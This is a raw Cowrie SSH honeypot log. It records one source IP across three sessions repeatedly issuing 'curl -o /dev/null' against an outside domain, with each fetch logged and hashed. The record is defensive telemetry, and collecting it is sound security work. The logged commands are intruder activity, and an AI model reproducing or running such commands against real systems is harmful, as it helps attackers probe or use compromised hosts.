{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.828778Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.830335Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.830913Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.832301Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.833008Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.864302Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.866043Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.867112Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.867876Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.871300Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.873414Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.874097Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.875762Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.876465Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.911153Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.913614Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.915216Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.916426Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.955883Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.958675Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.959504Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.961153Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.961801Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.992270Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:40.993448Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:40.994252Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.001012Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.004767Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.023729Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.024575Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.026487Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.027279Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.030253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.031896Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.032403Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.037142Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.065703Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.067968Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.069302Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.070256Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.073309Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.074721Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.077371Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.078526Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.084136Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.111336Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.111925Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.115606Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.119028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.122449Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.123246Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.126251Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.126896Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.154923Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.158994Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.159620Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.163038Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.164376Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.168477Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.169180Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.200333Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.202254Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.204288Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.205048Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.208470Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.209241Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.210918Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.211617Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.245954Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.247879Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.250391Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.252111Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.253064Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.253479Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.255502Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.256116Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.260129Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.261059Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.294563Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.296473Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
